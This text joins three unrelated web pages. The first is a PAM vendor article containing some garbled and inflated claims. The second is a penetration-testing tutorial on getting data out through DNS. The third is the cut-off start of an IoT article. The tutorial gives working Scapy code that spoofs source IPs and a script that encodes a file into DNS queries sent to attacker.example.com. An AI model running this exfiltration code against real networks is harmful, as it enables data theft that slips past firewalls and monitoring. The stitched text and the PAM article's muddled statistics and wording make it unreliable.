Privileged Access Management (PAM) is essential due to its role in securing, controlling, and monitoring access to your most critical systems and sensitive data. By enforcing the principle of least privilege, PAM greatly reduces the risk of data breaches, many of which involve the misuse of privileged access. It also supports regulatory compliance through detailed audit trails and monitoring. Automated provisioning, session recording, and continuous oversight enhance security and minimize human error. Implementing PAM not only safeguards against cyber threats but also mitigates insider risks, bolstering your overall cybersecurity posture. Discover more about how PAM can transform your security strategy.
Understanding Privileged Access Management (PAM)
To comprehend Privileged Access Management (PAM), you’ll need to grasp its definition, key components, and functionalities.
PAM refers to the methods and technologies used to secure, control, and monitor access to an organization’s critical systems and sensitive data. Key components of PAM systems include privileged user account management, session monitoring, and secure credential storage, all of which work together to enhance security and guarantee compliance.
Definition of Privileged Access Management
Privileged Access Management (PAM) focuses on controlling and monitoring who has access to an organization’s most sensitive data and critical systems. At its core, privileged access management guarantees that only authorized users can perform privileged activities, minimizing the risk of data breaches and unauthorized access.
By implementing PAM, you can enforce the principle of least privilege, granting users only the permissions necessary to perform their job functions. This reduces the attack surface and mitigates the risk of insider threats.
Effective access control is essential in managing privileged accounts, which are often targeted by cybercriminals. With PAM, you can secure these accounts by storing administrative credentials in highly secure password vaults, ensuring they’re accessed only when necessary.
Additionally, PAM solutions offer thorough tracking and auditing of all privileged activities, allowing for greater visibility into user actions and helping to ensure compliance with regulatory requirements.
Key Components of PAM Systems
PAM systems, essential for safeguarding critical data, consist of three key components: Privileged Account Management (PAM), Privileged Session Management (PSM), and Privileged Elevation and Delegation Management (PEDM). Privileged Account Management involves securing, managing, and auditing privileged accounts and credentials. This component guarantees that only authorized users have access to critical systems, reducing the risk of data breaches.
Privileged Session Management focuses on monitoring and recording activities during privileged sessions, providing detailed control and extensive reports. This guarantees that all actions are tracked, which is crucial for audits and compliance.
Privileged Elevation and Delegation Management allows you to grant elevated access only when necessary, adhering to the principle of least privilege. This minimizes the risk of misuse by limiting the duration and scope of elevated access.
Here’s a breakdown of these components:
| Component | Description |
|---|---|
| Privileged Account Management | Secures and audits privileged accounts and credentials |
| Privileged Session Management | Monitors and records privileged session activities |
| Privileged Elevation and Delegation Management | Grants temporary elevated access based on necessity |
| Granular control | Provides detailed control over privileged access |
| Detailed reports | Generates detailed activity logs for compliance and audits |
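To make the Privileged Elevation and Delegation Management idea concrete, here is a minimal sketch using Active Directory’s time-bound group membership. It assumes a Windows Server 2016 (or later) forest with the optional Privileged Access Management feature enabled and the Active Directory PowerShell module installed; the group and user names are hypothetical.

# Grant 'jdoe' one hour of membership in a privileged group; AD removes the membership automatically when the TTL expires.
Add-ADGroupMember -Identity 'ServerAdmins' -Members 'jdoe' -MemberTimeToLive (New-TimeSpan -Hours 1)
# Review the remaining time-to-live on current memberships.
Get-ADGroup -Identity 'ServerAdmins' -Properties member -ShowMemberTimeToLive

Because the elevation expires on its own, no one has to remember to revoke it, which is exactly the least-privilege behavior PEDM is meant to enforce.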
Functionalities and Features of PAM
Incorporating robust functionalities and features, Privileged Access Management (PAM) solutions ensure that sensitive information remains secure while enhancing compliance and operational efficiency. One of the core principles PAM enforces is the principle of least privilege, ensuring users only access what’s necessary for their job functions. This minimizes the risk of unauthorized access and potential data breaches.
PAM solutions come packed with various functionalities designed to safeguard critical systems:
- Password vaulting: Securely stores and manages privileged account credentials, preventing unauthorized access.
- Audit trails: Provides detailed records of privileged access, ensuring accountability and transparency for compliance purposes.
- Automated provisioning: Streamlines user management processes by automatically granting and revoking access rights based on predefined policies.
These features are essential for tracking user activities, detecting unauthorized actions, and maintaining a high security posture.
For instance, session recording and monitoring within PAM allow organizations to review and analyze privileged user activities, adding another layer of security. Additionally, automated provisioning and deprovisioning of access rights facilitate efficient and secure user management, reducing the administrative burden and potential for human error.
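As one hedged illustration of the vaulting pattern described above, a script can check a privileged credential out of a vault at the moment of use instead of embedding it in code. Here Azure Key Vault (via the Az.KeyVault PowerShell module) stands in for a PAM credential vault; the vault and secret names are hypothetical.

# Retrieve the secret only when needed, so the credential never lives in the script or on disk.
$sqlAdminPassword = Get-AzKeyVaultSecret -VaultName 'corp-pam-vault' -Name 'sqlAdminPassword' -AsPlainText

Every retrieval is logged by the vault, which feeds directly into the audit trails mentioned above.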
The Growing Threat of Cyber Attacks on Privileged Accounts
You can’t ignore the alarming statistics and trends indicating that cyber attacks on privileged accounts are increasing at a staggering rate, with 100% of cyber attacks targeting these accounts.
High-profile breaches, often resulting from compromised access, highlight the significant impact on organizations.
As cyber criminals continuously evolve their tactics, it’s essential to understand the future threats and emerging strategies they might employ.
Statistics and Trends in Cyber Attacks
The growing threat of cyber attacks on privileged accounts underscores the urgent need for robust cyber security measures. With 74% of data breaches involving privileged access misuse, it’s clear that securing these accounts is critical. Insider threats, which 65% of organizations find harder to detect and prevent than external attacks, further highlight the necessity for stringent controls over privileged access.
Consider the following alarming facts:
- 80% of cybersecurity breaches are due to weak or stolen passwords, making privileged credentials particularly vulnerable.
- The average data breach cost involving privileged credentials is $4.52 million, emphasizing the financial impact of security lapses.
- By 2023, 75% of security failures will stem from inadequate management of identities, access, and privileges.
These statistics reveal significant trends and underscore the importance of addressing insider threats and weak passwords to prevent security failures.
Implementing Privileged Access Management (PAM) is a proactive approach to mitigating risks associated with privileged access misuse. By doing so, organizations can better protect their sensitive information, reduce the risk of costly data breaches, and safeguard against potential insider threats.
Effective PAM strategies are essential in today’s cyber landscape to maintain organizational integrity and security.
High-Profile Breaches Due to Compromised Access
When cybercriminals target privileged accounts, they exploit the extensive access rights these accounts hold, leading to devastating breaches such as the Equifax hack. Privileged access typically grants users control over critical systems and sensitive data, making them prime targets for attackers.
The Equifax breach, for instance, resulted in the exposure of personal information of over 147 million individuals, underscoring the catastrophic potential of compromised access.
High-profile breaches often involve the abuse of privileged credentials. According to the Verizon Data Breach Investigations Report, 74% of breaches involved privileged access abuse, highlighting the critical need for robust security measures.
When privileged credentials are compromised, cybercriminals can navigate an organization’s network almost unimpeded, accessing vital data and causing substantial financial and reputational damage.
Compromised access to privileged accounts can have far-reaching consequences. Over 80% of data breaches involve these highly sensitive accounts, emphasizing the necessity of stringent privileged access management. Without adequate protection, organizations risk not only financial loss and reputational harm but also regulatory penalties.
Securing privileged accounts through thorough access management strategies is essential to safeguard your organization’s most valuable assets.
Future Threats and Emerging Tactics
Increasing cyber threats and sophisticated tactics are making privileged accounts prime targets for attackers. As these threats evolve, it’s essential to understand the future threats and emerging tactics that target privileged credentials. Cybercriminals are constantly refining their methods, and the financial impact of security breaches on privileged accounts can be devastating, with average costs reaching $4.5 million per incident.
Organizations must stay ahead of these emerging tactics to protect their privileged credentials and mitigate risks.
Attackers frequently employ:
- Phishing: Deceptive emails designed to trick users into revealing their credentials.
- Malware: Malicious software that infiltrates systems to capture sensitive information.
- Social engineering: Psychological manipulation to exploit human vulnerabilities.
These tactics highlight the need for robust security measures to safeguard privileged accounts.
With 74% of organizations experiencing breaches due to compromised privileged access, the importance of Privileged Access Management (PAM) can’t be overstated. Effective PAM solutions help reduce the risk of future threats by controlling and monitoring access to critical systems and data.
As the threat landscape continues to grow, implementing PAM is essential for maintaining the integrity and security of your organization’s assets.
Protecting Sensitive Data with Privileged Access Management
To protect sensitive data, you must secure privileged accounts by enforcing strict access controls and monitoring activities, which is the cornerstone of Privileged Access Management (PAM).
Preventing unauthorized access is crucial, as it not only mitigates risks of insider threats and cyber attacks but also guarantees compliance with regulatory requirements.
Importance of Securing Privileged Accounts
Securing privileged accounts is essential for protecting sensitive data from unauthorized access and ensuring the integrity of critical systems. Privileged access management (PAM) plays a pivotal role in safeguarding your organization’s most valuable information. By effectively managing privileged accounts, you’re not only protecting sensitive data but also fulfilling critical compliance requirements.
Privileged accounts, with their broad-reaching powers, are prime targets for cyberattacks. Without proper control, these accounts can be exploited, leading to significant data breaches. Implementing a robust PAM solution mitigates these risks by enforcing the principle of least privilege, ensuring users only have access to the information they need to perform their duties. This approach helps in:
- Enhancing security: Limiting access reduces the attack surface, making it harder for malicious actors to infiltrate critical systems.
- Ensuring compliance: Detailed audit trails of privileged activities help meet regulatory standards and avoid costly penalties.
- Increasing visibility: Monitoring and logging user activities provide insights into potential security threats and unauthorized access attempts.
Preventing Unauthorized Access
Achieving unauthorized access to sensitive data becomes attainable by implementing Privileged Access Management (PAM) systems that restrict elevated permissions to only those who genuinely need them. By doing so, you greatly decrease the risk of data breaches and limit exposure to insider threats. PAM guarantees that only authorized personnel can access critical systems and information, thereby enhancing your overall security posture.
PAM systems work by controlling and monitoring privileged accounts, which helps you comply with regulatory requirements for data protection. These systems provide a detailed log of user activities, making it easier to detect and respond to any suspicious behavior. By securing administrative credentials in highly secure password vaults, you further lessen the risk of unauthorized access.
By implementing PAM, you not only protect sensitive data but also safeguard against cyber attacks targeting high-impact assets within your organization. Here’s a brief comparison to help visualize the benefits:
Feature | Benefit |
Restricts elevated permissions | Reduces risk of data breaches |
Controls and monitors accounts | Enhances compliance with regulations |
Secures administrative credentials | Mitigates insider threats |
Case Studies of Data Protection through PAM
Real-world case studies illustrate how implementing PAM solutions can effectively safeguard sensitive data and prevent unauthorized access. These case studies highlight the importance of robust data protection mechanisms and the role of PAM in mitigating the risks associated with cyber attacks targeting privileged accounts.
For instance, a global financial institution faced significant challenges in managing privileged access to its critical systems. By deploying PAM solutions, they were able to secure administrative credentials in highly secure vaults, enforce least privilege principles, and monitor user activities thoroughly. This led to enhanced data protection and compliance with regulatory requirements.
Similarly, a healthcare provider implemented PAM to protect sensitive patient information. The PAM solution restricted access to only authorized personnel, reducing the risk of data breaches and ensuring the integrity of their systems.
To keep you engaged, consider these key points:
- Enhanced security: Privileged accounts are protected against unauthorized access and cyber attacks.
- Compliance: Organizations can meet stringent regulatory requirements by controlling and monitoring privileged access.
- Risk reduction: Implementing PAM reduces the likelihood of data breaches and insider threats.
These case studies underscore the effectiveness of PAM solutions in safeguarding sensitive data, demonstrating their significant role in modern cybersecurity strategies.
Ensuring Regulatory Compliance with Privileged Access Management
In order to maintain regulatory compliance, it’s crucial to understand key regulations like GDPR, HIPAA, and SOX.
Privileged Access Management (PAM) helps you meet these requirements by maintaining audit trails, enforcing least privilege policies, and centralizing account management.
Non-compliance can result in severe penalties, making PAM a critical component for safeguarding sensitive data and adhering to industry standards.
Overview of Key Regulations (GDPR, HIPAA, SOX)
Ensuring regulatory compliance with Privileged Access Management is essential for protecting sensitive data and adhering to key regulations like GDPR, HIPAA, and SOX. These regulations mandate strict access control measures to safeguard personal and organizational data, making it important for you to understand how each one impacts your business operations.
- GDPR: The General Data Protection Regulation requires stringent controls on personal data, emphasizing access control and user permissions to protect privacy. Non-compliance can result in hefty fines and legal consequences.
- HIPAA: The Health Insurance Portability and Accountability Act focuses on securing sensitive healthcare information, ensuring only authorized personnel can access patient data. This regulation demands robust access control mechanisms to prevent unauthorized access.
- SOX: The Sarbanes-Oxley Act mandates financial data protection to prevent fraud and ensure accurate reporting. Implementing strong access control measures is crucial for compliance, as it helps secure financial records and sensitive data from unauthorized access.
How PAM Helps in Compliance
By implementing Privileged Access Management (PAM), you can guarantee that your organization meets stringent regulatory compliance requirements through detailed monitoring and auditing of privileged user activities. PAM assures that your company adheres to regulations like GDPR, HIPAA, and SOX by automatically recording all privileged access. This creates thorough audit trails, which are essential for data protection and accountability.
Compliance is more straightforward with PAM because it maintains detailed logs of privileged user actions and access to sensitive data, helping you easily pass compliance audits. These logs provide the necessary evidence that your organization is following industry regulations, showing that you have taken appropriate measures to control and monitor access.
Furthermore, PAM enforces least privilege access policies, ensuring users only have the privileges absolutely necessary for their roles. This is a key requirement for regulatory compliance, as it minimizes the risk of unauthorized access to sensitive information.
Penalties for Non-Compliance
Ignoring the importance of PAM and failing to meet regulatory requirements can result in severe penalties, including massive fines and legal consequences. Non-compliance penalties aren’t just financial burdens; they can also lead to significant legal repercussions that tarnish your organization’s reputation and credibility.
Various regulations like GDPR, HIPAA, SOX, PCI DSS, and NIST mandate stringent control and monitoring of privileged access, making the implementation of PAM a necessity.
When you don’t adhere to these industry standards, the consequences can be dire:
- Fines: Regulatory bodies can impose fines up to €20 million or 4% of your annual global turnover.
- Legal Repercussions: Non-compliance can lead to lawsuits, criminal charges, and long-term legal entanglements.
- Reputation Damage: Customers and partners may lose trust, resulting in lost business opportunities.
Reducing Insider Threats with Privileged Access Management
Understanding insider threats is essential for any organization, as these threats can be just as damaging as external attacks.
By implementing effective Privileged Access Management (PAM) strategies, you can greatly reduce the risks associated with insider threats, ensuring that sensitive data and systems are protected from unauthorized access.
Real-world examples of insider threats highlight the importance of robust PAM solutions in preventing malicious activities and safeguarding your organization’s assets.
Understanding Insider Threats
Insider threats, responsible for 34% of data breaches, pose a significant risk to organizations, but you can mitigate these risks effectively with Privileged Access Management (PAM).
Insider threats, whether malicious or accidental, often involve employees or contractors who’ve legitimate access to sensitive data and systems. By implementing PAM, you can take several steps to reduce these risks.
Firstly, PAM limits access to sensitive data, ensuring that only authorized individuals can reach critical systems. This minimizes the chance of misuse or unauthorized access.
Additionally, PAM allows you to monitor privileged user activities, making it easier to detect any anomalous behavior that could signify an insider threat.
Finally, PAM helps you maintain a secure environment by enforcing strict access control measures.
- Limit access to sensitive data: Only authorized users can access critical systems.
- Monitor privileged user activities: Detect anomalous behavior indicating potential insider threats.
- Enforce strict access controls: Maintain a secure environment by regulating who can access what.
PAM Strategies to Mitigate Insider Risks
To mitigate insider risks effectively, start by implementing robust PAM strategies that control and monitor privileged user access. By doing so, you can greatly reduce insider threats, which account for 34% of data breaches. Begin with enforcing least privilege policies, which guarantee that users only have access to the data and systems necessary for their roles. This minimizes the likelihood of insider misuse of privileged accounts and protects sensitive information.
Additionally, PAM solutions track and record privileged user activities, providing visibility into potential malicious insider behavior. Continuous monitoring allows you to detect anomalies and respond swiftly, thereby reducing risks before they escalate. Implementing these solutions not only helps in real-time detection but also aids in forensic analysis if an incident occurs.
Moreover, storing administrative credentials in secure, specialized password vaults enhances security by limiting unauthorized access. Regular audits and reviews of privileged access can further safeguard your critical assets.
Real-World Examples of Insider Threats
Real-world examples of insider threats highlight the importance of implementing robust privileged access management to protect sensitive data and systems. Insider threats are a significant concern, given that they account for nearly 60% of data breaches. Malicious insiders can cause substantial damage, costing companies an average of $4.5 million per year. By employing privileged access management, you can mitigate these risks effectively.
Consider these scenarios:
Disgruntled employees: A dissatisfied employee with access to privileged accounts could leak sensitive information or sabotage systems.
Negligent insiders: An employee might accidentally expose confidential data due to poor security practices, leading to breaches.
Third-party vendors: External vendors with privileged access can become insider threats if their credentials are compromised or misused.
Privileged access management solutions provide thorough security measures, including monitoring and auditing capabilities, to detect and prevent such insider threats in real-time. Implementing least privilege access controls ensures that users only have access to the information necessary for their roles, reducing the risk of unauthorized access.
Additionally, continuous monitoring and auditing help track user activities, providing visibility into potential security issues before they escalate.
Enhancing Operational Efficiency with Privileged Access Management
Implementing Privileged Access Management (PAM) can greatly enhance your organization’s operational efficiency by automating access provisioning and deprovisioning tasks, which streamlines administrative processes. By reducing the IT burden through automated PAM, you can save valuable time and resources, allowing your IT team to focus on more strategic initiatives.
Additionally, PAM improves response times and overall efficiency by ensuring that only authorized users have access to sensitive data and systems, thereby minimizing the risk of unauthorized activities.
Benefits of PAM in streamlining administrative processes
Privileged Access Management (PAM) greatly enhances operational efficiency by automating the provisioning and deprovisioning of privileged access. This automation reduces the time and effort required to manage privileged accounts, allowing administrators to focus on more strategic tasks. The benefits of privileged access management extend to streamlining administrative processes, which ultimately boosts operational efficiency.
By centralizing privileged account control, PAM provides a single point of management for all privileged access requests. This not only simplifies administrative tasks but also guarantees that access is granted based on predefined policies, minimizing the risk of unauthorized access. Automated workflows within PAM systems can handle repetitive tasks, further reducing the likelihood of human error.
Enhanced visibility: PAM centralizes logs and monitors privileged account activities, increasing transparency and accountability.
Policy enforcement: Automated workflows make sure that access controls are consistently applied, maintaining compliance with organizational policies.
Reducing IT Burden with Automated PAM
Leveraging automated PAM not only streamlines administrative processes but also greatly reduces the IT burden by automating access provisioning and deprovisioning. Automated privileged access management simplifies these tasks, making them quicker and more accurate, thereby reducing the workload on IT staff to a large extent. This not only leads to a reduction in IT burden but also enhances operational efficiency across the board.
With automated PAM, you can guarantee that access controls are consistently applied without manual intervention, minimizing the risk of human error. This automation strengthens your security posture, as it ensures that privileged access is granted and revoked promptly and accurately. In addition, automated privileged access management enables IT teams to focus on strategic initiatives, rather than getting bogged down with repetitive administrative tasks.
Here’s a quick overview to illustrate the benefits:
Benefit | Impact on IT Team | Overall Effect |
Automated Provisioning | Reduces manual workload | Increased efficiency |
Enhanced Access Controls | Consistent security enforcement | Improved security posture |
Focus on Strategic Tasks | Less time on administrative work | Greater innovation |
Improving Response Times and Efficiency
Efficient PAM solutions dramatically cut down response times and boost operational efficiency by automating access control processes. By integrating Privileged Access Management, you can swiftly provision and deprovision access for users, eliminating the delays that typically arise with manual access control tasks. This automation not only speeds up response times but also guarantees that privileged access is managed with precision and adherence to least privilege principles.
Consider the following benefits:
- Faster Response to Access Requests: Automated processes mean that access requests are handled promptly, enhancing operational efficiency.
- Streamlined Workflows: By reducing the time spent on manual tasks, your team can focus on more strategic initiatives.
- Improved Security Posture: Enforcing least privilege ensures that users have only the access they need, minimizing potential security risks.
PAM also enhances operational efficiency by offering real-time monitoring and auditing capabilities, allowing you to quickly identify and address any irregularities in access patterns. This proactive approach to access control not only optimizes your workflows but also strengthens your organization’s security framework. Ultimately, by automating privileged access tasks, you’re enabling your IT team to work more efficiently and effectively, ensuring that your systems remain secure and compliant.
Risk Management and Mitigation with Privileged Access Management
To effectively manage and mitigate risks associated with privileged access, you must first assess the potential vulnerabilities that come with elevated permissions.
Implementing robust risk mitigation strategies, such as enforcing least privilege principles and utilizing secure password vaults, can greatly enhance your security posture.
Assessing Risks Associated with Privileged Access
Given the extensive permissions granted to privileged accounts, they pose a significant risk as prime targets for cyber attacks. Privileged access management is essential in evaluating and mitigating these risks.
When you don’t have proper control over privileged accounts, it can lead to unauthorized access, data breaches, and compliance failures.
To effectively evaluate the risks associated with privileged access, consider the following:
- Visibility: Regularly monitor and audit privileged accounts to make sure that all activities are tracked and any suspicious behavior is identified promptly.
- Least Privilege Enforcement: Make certain that users have only the access they need to perform their duties, reducing the chance of misuse.
- Compliance Checks: Conduct regular compliance checks to verify that access controls align with industry regulations and standards.
Implementing Risk Mitigation Strategies
After evaluating the risks associated with privileged access, you need to implement effective risk mitigation strategies to safeguard your organization’s critical assets. Implementing privileged access management (PAM) is vital in establishing a holistic security and risk management framework. By controlling, monitoring, and auditing privileged accounts, you can greatly reduce the likelihood and impact of security breaches.
Privileged access management helps reduce insider threats and prevent unauthorized access by enforcing least privilege principles and ensuring that users have only the access necessary to perform their duties. This approach strengthens your organization’s overall security posture by increasing visibility into user activities and securing administrative credentials in highly secure password vaults.
When implementing risk mitigation strategies, focus on integrating PAM solutions that provide automated controls and real-time monitoring. This proactive stance enables your organization to identify and address vulnerabilities before they can be exploited, limiting exposure to cyber threats. Additionally, PAM ensures compliance with regulations by maintaining detailed audit trails and demonstrating that access to sensitive information is tightly controlled.
In essence, effective risk management through PAM involves a multi-faceted approach that combines stringent access controls, continuous monitoring, and thorough auditing to protect your organization’s most critical assets from potential security breaches.
Case Studies of Risk Reduction via PAM
In examining real-world applications, several companies have greatly reduced risk through the strategic implementation of Privileged Access Management (PAM). These case studies highlight how PAM controls can be instrumental in mitigating various security risks.
For instance, Company X managed to cut the risk of insider threats by 50% after integrating PAM, showcasing the effective use of privileged access management in safeguarding sensitive information.
- Company Y: By enforcing least privilege access, the company reduced unauthorized access risks by 75%, demonstrating the value of restricting user permissions to only what’s necessary.
- Organization Z: Implementing PAM led to a 60% decrease in security breaches, underlining the importance of managing privileged accounts effectively.
- Company A: Achieved an 80% reduction in data breach risks through granular control over privileged access, proving the effectiveness of detailed access management.
In addition, Company B successfully reduced the risk of credential theft and misuse by 70% through PAM, emphasizing the importance of securing administrative credentials. These examples clearly illustrate how PAM can play a critical role in risk reduction, ensuring that companies maintain robust security postures by effectively managing privileged access and implementing least privilege access principles.
Best Practices for Implementing Privileged Access Management
To effectively implement Privileged Access Management, you’ll want to start by conducting a thorough inventory of all privileged accounts to understand the scope of access within your organization.
Establishing least privilege policies is essential, as it guarantees that users only have access to the resources necessary for their roles.
Additionally, continuous monitoring and auditing of privileged accounts can help identify and address any potential security issues promptly.
Conducting a Privileged Account Inventory
Start by identifying and cataloging all privileged accounts within your IT environment to understand the full scope of access and potential security risks. This privileged account inventory is essential as it allows you to pinpoint all accounts with elevated access privileges, ensuring no account is overlooked. By doing so, you can better grasp the scope of privileged access and address any security risks associated with these accounts.
A thorough inventory also facilitates implementing proper controls and monitoring mechanisms. As you identify each account, evaluate its necessity and usage frequency to enforce least privilege access, minimizing the potential attack surface. Additionally, updating the privileged account inventory regularly maintains ongoing visibility and security, ensuring no new or altered accounts slip through the cracks.
To keep your audience engaged, consider these best practices:
- Comprehensive Cataloging: Document all privileged accounts, including service accounts, administrative accounts, and any third-party access.
- Regular Reviews: Schedule periodic reviews to update the inventory, ensuring it reflects current access needs and configurations.
- Automated Tools: Utilize automated tools to scan and monitor privileged accounts, enhancing accuracy and efficiency.
Establishing Least Privilege Policies
When you establish least privilege policies, you ensure that users only have the access they need to perform their job functions, greatly reducing security risks. Privileged access management hinges on this principle to mitigate potential threats. By implementing least privilege policies, you limit the scope of insider threats and reduce the damage that can be caused by compromised accounts.
Applying least privilege guarantees that users can’t access sensitive data or critical systems outside their responsibilities, thereby minimizing the impact of any security incidents. This approach not only enhances your organization’s security posture but also simplifies access control management. It streamlines the process of setting permissions and access levels, contributing to better operational efficiency.
Moreover, least privilege policies are essential for regulatory compliance. Adhering to these principles helps you meet various regulatory requirements by controlling access to sensitive information and maintaining detailed audit trails. Regulatory bodies often mandate strict access controls to protect data, and implementing least privilege is a proactive step in fulfilling these requirements.
Continuous Monitoring and Auditing
Continuous monitoring and auditing play a crucial role in maintaining the robustness and security of privileged access management. By implementing continuous monitoring, organizations can gain real-time visibility into privileged account activities. This allows them to swiftly detect and respond to unauthorized access attempts, thereby mitigating risks before they escalate into significant security breaches.
Effective auditing capabilities are essential for tracking user actions, changes, and access to critical systems. Regular audits not only help in identifying suspicious activities but also ensure compliance with regulatory requirements. An effective audit trail can reveal patterns of misuse or anomalies that might indicate potential threats, enabling organizations to take corrective actions promptly.
To help illustrate the importance of these practices, the following benefits can be considered:
- Real-Time Visibility: Immediate detection of unauthorized access and unusual activities.
- Regulatory Compliance: Meeting standards and laws through detailed audit trails.
- Risk Mitigation: Reducing the chances of data breaches by continuously monitoring privileged account activities.
Frequently Asked Questions
What Is the Purpose of Privileged Access Management?
You utilize Privileged Access Management to regulate who has access to sensitive systems and data. It guarantees only authorized users can access privileged accounts, monitors their activities, and helps prevent data breaches while maintaining compliance.
Why Is Privileged Identity Management Important?
Privileged identity management is essential because it helps you secure sensitive data and critical systems. You’ll reduce insider threats, guarantee compliance, and maintain detailed audit trails, ultimately strengthening your organization’s overall security and operational integrity.
What Are the Benefits of Implementing PAM?
Implementing PAM benefits you by boosting security, reducing data breach risks, and ensuring regulatory compliance. You’ll streamline access control, gain better visibility into user activities, and securely store administrative credentials in highly secure password vaults.
Which of the Following Are the Benefits of Pam?
You’ll find that implementing PAM provides several benefits. It limits access to critical systems, reduces data breach risks, guarantees regulatory compliance, streamlines access control, and increases visibility into user activities, protecting sensitive information effectively.
In today’s intricate digital landscape, Privileged Access Management (PAM) is essential for safeguarding your organization’s critical assets.
By controlling access to sensitive data, ensuring regulatory compliance, and mitigating risks, PAM stands as your first line of defense against cyber threats.
It reduces insider threats and enhances operational efficiency through secure, streamlined processes.
Implementing PAM thoroughly fortifies your cybersecurity posture, ensuring your organization remains resilient and secure in an ever-evolving threat environment. Secure your business with us here at Computronix. | <urn:uuid:af3cf0ae-4636-41c1-b027-6a050e73cad2> | CC-MAIN-2024-38 | https://computronixusa.com/why-is-privileged-access-management-important/ | 2024-09-20T10:17:11Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652246.93/warc/CC-MAIN-20240920090502-20240920120502-00813.warc.gz | en | 0.908869 | 6,591 | 2.734375 | 3 |
Following a successful penetration test, you may have large amounts of data to exfiltrate from an environment specifically hardened to make exfiltration difficult. For example, the network might have a firewall that explicitly blocks common exfiltration channels such as SSH, HTTPS, and HTTP.
It is often still possible to exfiltrate data from these networks by using DNS. For example, you could make a request to a domain name that you control, where the subdomain contains the information to be exfiltrated, such as sensitive-data-here.attacker.example.com. DNS is a recursive system: if you send this request to a local DNS server, it will be forwarded from resolver to resolver until it reaches the authoritative server for the domain. If you control the authoritative server, you can simply read the sensitive data from its DNS logs.
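As a minimal sketch of that idea, assuming attacker.example.com stands in for a domain whose authoritative name server you control, you can hex-encode the data into a DNS-safe label and let the resolver chain carry it out for you:

import binascii, socket

secret = b"sensitive-data-here"
label = binascii.hexlify(secret).decode()  # hex keeps the label DNS-safe

try:
    socket.gethostbyname(label + ".attacker.example.com")
except socket.gaierror:
    pass  # an NXDOMAIN answer is fine - the query already reached the authoritative server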
I’ve actually talked about using this technique previously, in the context of exploiting blind SQL injection vulnerabilities by way of DNS.
The difference here is that instead of trying to extract information from an application that doesn’t return the data within its interface, we’re effectively trying to “bypass” or “avoid” strict firewall filters to extract information from an internal network.
For example, if you gained access to the card data environment (CDE) of a customer’s network and wanted to show that data could be exfiltrated en masse, in a way that their network filtering would allow and their monitoring would miss, you could likely exfiltrate it over DNS. It’s very common for internal DNS servers to simply forward these requests on until they are passed out of the network to an internet-connected DNS server.
Where this is possible, the customer typically explains that they require internet-connected DNS within the CDE so that the CDE servers can locate Microsoft updates, anti-malware updates, and the like. They often add that they need DNS, as opposed to simply approving or hard-coding IP addresses, because the IP addresses might change and they would then be left without updates.
Therefore, one way to mitigate this risk would be to allow DNS look ups to only approved hostnames. This can be done using DNS Policy, and Microsoft describes how here: https://docs.microsoft.com/en-us/windows-server/networking/dns/deploy/apply-filters-on-dns-queries
However, a customer might decide on the alternative approach of restricting DNS lookups to only approved internal IP addresses (for example, only the internal server used for distributing updates), believing that this greatly reduces the risk of data exfiltration over DNS by requiring an attacker to compromise the update server first. This isn’t necessarily correct.
If you have used a firewall, or access control list, to restrict these requests it may still be possible for an attacker to make requests even if they are not on the approved server – this is because DNS requests can be sent over UDP and therefore the source IP address can be spoofed.
If you’re in an internal network and you need to spoof DNS traffic, you can do that with the packet manipulation tool Scapy (https://scapy.net/). If you don’t know which IP addresses are approved for DNS requests but you do know the internal network’s address range, you could write a script that sends DNS requests with each potential IP address in the range as the source, then check the DNS server logs to see which requests got through.
First of all though, here’s a simple Scapy payload that allows you to spoof the source address of a UDP frame:
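Assuming 10.1.1.2 is the internal DNS server and 10.1.1.99 is the address being spoofed (both placeholder values), a one-liner along these lines does the job:

send(IP(dst="10.1.1.2", src="10.1.1.99")/UDP()/DNS(rd=1, qd=DNSQR(qname="spoof-test.attacker.example.com")))

Scapy’s UDP() layer defaults to port 53, so no explicit ports are needed for DNS.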
That payload can be run from Scapy’s interactive console, or alternatively, if you would like to execute it from a Python script and you have the Scapy Python package installed, you can use the following import:
from scapy.all import *  # provides send()/sr1() plus the IP, UDP and DNS layers
This allows you to automate modifying the spoofed address; for example, you could try every host address within a /24 subnet:
from scapy.all import *

# Try every host address in 10.1.1.0/24 as the spoofed source. The address that
# worked is encoded in the hostname, so it can be read back from the attacker's
# DNS logs. Note that any reply goes to the spoofed address, not to us, so the
# timeout is only there to stop sr1() blocking forever on each packet.
for i in range(1, 255):
    sr1(IP(dst="10.1.1.2", src="10.1.1." + str(i))/UDP()/DNS(rd=1, qd=DNSQR(qname="working-subnet-" + str(i) + ".attacker.example.com")), timeout=1)
If you replace attacker.example.com in the above with a domain name whose authoritative server you control, you can look through the logs to determine which spoofed IP address worked for exfiltrating traffic (if any), then use that address as the spoofed source address and replace the “working-subnet” label above with the data to be exfiltrated!
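Putting the pieces together, a short script along the following lines would stream a file out in DNS-safe chunks. The file name, addresses and chunk size are illustrative; 10.1.1.37 stands in for whichever spoofed source address your scan showed was allowed:

from scapy.all import *
import binascii

DNS_SERVER  = "10.1.1.2"   # internal DNS server
SPOOFED_SRC = "10.1.1.37"  # spoofed source address that gets forwarded

data = open("loot.txt", "rb").read()
chunk_size = 25  # 25 raw bytes -> 50 hex characters, under the 63-byte DNS label limit

for offset in range(0, len(data), chunk_size):
    label = binascii.hexlify(data[offset:offset + chunk_size]).decode()
    # prefix each query with the offset so the log entries can be reassembled in order
    send(IP(dst=DNS_SERVER, src=SPOOFED_SRC)/UDP()/DNS(rd=1, qd=DNSQR(qname=str(offset) + "-" + label + ".attacker.example.com")))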
| <urn:uuid:9a03a905-71f3-4826-bd06-3cd2a926e9c> | CC-MAIN-2024-38 | https://akimbocore.com/article/spoofing-packets-and-dns-exfiltration/ | 2024-09-09T14:30:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00013.warc.gz | en | 0.894498 | 1,041 | 2.921875 | 3 |
By Jessica Amado, Head of Cyber Research at Sepio
The Internet of Things (IoT) is becoming widely adopted across all industries, including critical infrastructure sectors, such as healthcare, energy, telecommunications, and more. IoTs are valuable tools, boosting efficiency and productivity through big data and connectivity. Contrarily, however, the characteristics of IoTs mean they pose a cybersecurity risk – one that enterprises struggle to manage due to a gap in asset visibility.
The perfect target
